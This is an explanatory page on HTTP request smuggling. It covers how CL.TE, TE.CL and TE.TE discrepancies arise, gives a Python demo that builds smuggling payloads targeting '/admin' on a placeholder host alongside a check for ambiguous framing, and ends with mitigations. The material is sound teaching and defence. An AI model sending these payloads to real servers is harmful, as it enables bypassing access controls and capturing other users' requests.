HTTP Request Smuggling
HTTP request smuggling is a technique that exploits discrepancies in how a front-end server (a reverse proxy, load balancer or CDN edge) and the back-end server behind it interpret the boundaries of HTTP/1.1 requests carried over a shared connection. Because the smuggled bytes are processed as the start of the next request on that connection, the consequences include bypassing front-end access controls (unauthorized access), capturing other users' requests and responses (data leakage), web cache poisoning, and denial of service.
How it Works
The core of HTTP request smuggling lies in the inconsistent interpretation of request boundaries between the front-end and back-end servers. Both reuse one TCP connection for many requests, so each must decide where one request's body ends and the next request begins. HTTP/1.1 offers two ways to frame a body: a Content-Length header giving the byte count, and a Transfer-Encoding: chunked header, where the body is a series of length-prefixed chunks ending in a zero-length chunk. RFC 7230 (and RFC 9112) state that when both headers are present, Transfer-Encoding takes precedence and the message may be treated as an error, but real implementations differ. An attacker therefore sends a request carrying both headers, chosen so that the two servers disagree on its length: the bytes one server treats as the tail of the body are treated by the other as the beginning of a new request, and that new request is then completed by, or prepended to, whatever the next user sends on the same connection.
Common Scenarios
The classic variants are named after which header the front end (first) and the back end (second) honour:
- CL.TE: the front end uses Content-Length, the back end uses Transfer-Encoding. The Content-Length covers the whole body, so the front end forwards everything; the body begins with a zero-length chunk, so the back end stops there and keeps the remaining bytes as the start of the next request.
- TE.CL: the front end uses Transfer-Encoding, the back end uses Content-Length. The Content-Length is sized to cover only the chunk-size line, so the back end treats the chunk data itself as a new request.
- TE.TE: both servers support Transfer-Encoding, but one of them can be induced to ignore the header by obfuscating it (a misspelled value, unusual whitespace, or a duplicated header), which reduces the situation to CL.TE or TE.CL.
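The following is an added example, not code from the original page or from the interactive analyzer it links to. It parses one HTTP/1.1 byte stream under two framing policies, the way a Content-Length-first front end and a Transfer-Encoding-first back end would, and shows where the two disagree for a CL.TE and a TE.CL payload. The last function is the check a front end can run to reject ambiguous requests, as recommended under Mitigation below. The host name, paths and payloads are constructed for the demonstration.

```python
# Added example (not the page's own code): parse one HTTP/1.1 byte stream
# under two framing policies and show where a front end and a back end would
# disagree. Host names, paths and payloads below are constructed for the demo.

CRLF = b"\r\n"


def parse_headers(buf, pos=0):
    """Return (request_line, headers, body_start) for the message starting at
    pos, or None if the header block is not yet complete. Header names are
    lower-cased; values are kept in a list so duplicates stay visible."""
    end = buf.find(CRLF + CRLF, pos)
    if end < 0:
        return None
    lines = buf[pos:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, end + 4


def read_chunked(buf, pos):
    """Decode a chunked body starting at pos. Returns (body, position after the
    terminating chunk and trailers). Raises ValueError if bytes are missing."""
    body = b""
    while True:
        nl = buf.find(CRLF, pos)
        if nl < 0:
            raise ValueError("incomplete chunk-size line")
        size = int(buf[pos:nl].split(b";")[0].strip(), 16)  # drop chunk extensions
        pos = nl + 2
        if size == 0:
            while True:  # trailer section ends with an empty line
                nl = buf.find(CRLF, pos)
                if nl < 0:
                    raise ValueError("incomplete trailers")
                line, pos = buf[pos:nl], nl + 2
                if not line:
                    return body, pos
        if len(buf) < pos + size + 2 or buf[pos + size:pos + size + 2] != CRLF:
            raise ValueError("incomplete chunk data")
        body += buf[pos:pos + size]
        pos += size + 2


def split_requests(buf, prefer):
    """Split buf into complete requests under one framing policy.
    prefer="cl": honour Content-Length whenever present (chunked only as fallback).
    prefer="te": honour Transfer-Encoding: chunked whenever present (the RFC rule).
    Returns (list of (request_line, body), leftover bytes still waiting for more
    data). The leftover is what the server would prepend to the next request on
    the connection, i.e. the smuggled prefix."""
    requests, pos = [], 0
    while pos < len(buf):
        parsed = parse_headers(buf, pos)
        if parsed is None:
            break
        request_line, headers, body_start = parsed
        has_cl = "content-length" in headers
        has_te = any(v.lower() == "chunked" for v in headers.get("transfer-encoding", []))
        use_chunked = has_te and (prefer == "te" or not has_cl)
        try:
            if use_chunked:
                body, pos = read_chunked(buf, body_start)
            elif has_cl:
                length = int(headers["content-length"][0])
                if len(buf) < body_start + length:
                    raise ValueError("incomplete body")
                body, pos = buf[body_start:body_start + length], body_start + length
            else:
                body, pos = b"", body_start
        except ValueError:
            break
        requests.append((request_line, body))
    return requests, buf[pos:]


def build_cl_te():
    """CL.TE payload: Content-Length covers the whole body, so a CL front end
    forwards it all; a TE back end stops at the zero-length chunk and keeps the
    rest. The smuggled prefix has no blank line, so the victim's request line
    will be appended to the Foo header."""
    smuggled = b"GET /admin HTTP/1.1" + CRLF + b"Foo: x"
    body = b"0" + CRLF + CRLF + smuggled
    return (b"POST / HTTP/1.1" + CRLF + b"Host: shop.example" + CRLF
            + b"Content-Length: %d" % len(body) + CRLF
            + b"Transfer-Encoding: chunked" + CRLF + CRLF + body)


def build_te_cl():
    """TE.CL payload: Content-Length is sized to cover only the chunk-size line,
    so a CL back end reads the chunk data as a fresh request. That request's own
    Content-Length: 30 exceeds the bytes that follow it, so the back end waits
    and swallows the start of the next user's request."""
    smuggled = b"GET /admin HTTP/1.1" + CRLF + b"Content-Length: 30" + CRLF + CRLF
    size_line = b"%x" % len(smuggled) + CRLF          # b"2b\r\n" for 43 bytes
    chunked = size_line + smuggled + CRLF + b"0" + CRLF + CRLF
    return (b"POST / HTTP/1.1" + CRLF + b"Host: shop.example" + CRLF
            + b"Content-Length: %d" % len(size_line) + CRLF
            + b"Transfer-Encoding: chunked" + CRLF + CRLF + chunked)


def framing_disagrees(buf):
    """Front-end check: if the two policies would split the stream differently,
    the request is ambiguous and should be rejected or re-framed, not forwarded."""
    return split_requests(buf, "cl") != split_requests(buf, "te")


if __name__ == "__main__":
    for name, payload in (("CL.TE", build_cl_te()), ("TE.CL", build_te_cl())):
        for policy in ("cl", "te"):
            reqs, leftover = split_requests(payload, policy)
            print(f"{name} seen by a {policy.upper()} parser: "
                  f"{len(reqs)} request(s), leftover={leftover!r}")
        print(f"{name} ambiguous: {framing_disagrees(payload)}")
```

Running the script prints, for each payload, how many complete requests each policy sees and what it holds back. For CL.TE the CL parser sees one request and nothing left over, while the TE parser sees one request with an empty body and holds GET /admin as the start of the next request; for TE.CL the roles reverse. The chunked check accepts only an exact "chunked" value, which is the strict behaviour; a lenient parser that also accepts obfuscated spellings is what turns a TE.TE case into one of the other two.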
Interactive Tool
Try our interactive HTTP Request Smuggling Analyzer to build and visualize how these attacks work.
Mitigation
Mitigation strategies include:
- Ensure the front-end and back-end servers apply the same rules for framing requests, ideally by running the same HTTP parser or software stack, so that no request can be read two different ways.
- Reject requests that carry both Content-Length and Transfer-Encoding, or whose Transfer-Encoding value is anything other than a well-formed chunked, rather than guessing which header to honour; RFC 7230 and RFC 9112 permit treating such messages as errors.
- Have the front end normalize every request it forwards, re-framing the body with a single unambiguous Content-Length, so the back end never sees the original ambiguous headers.
- Use HTTP/2 end to end. HTTP/2 frames carry explicit lengths, which removes the Content-Length/Transfer-Encoding ambiguity, but only if the back-end connection is HTTP/2 as well: a front end that accepts HTTP/2 and downgrades to HTTP/1.1 for the back end reintroduces the problem unless it strips or rejects Content-Length and Transfer-Encoding headers supplied by the client instead of copying them into the rewritten request.
- Close the back-end connection after any request that fails to parse cleanly, so that leftover bytes cannot be prepended to another user's request.
- Regularly audit and patch proxies, load balancers and application servers; request smuggling bugs are fixed in the HTTP parsers themselves.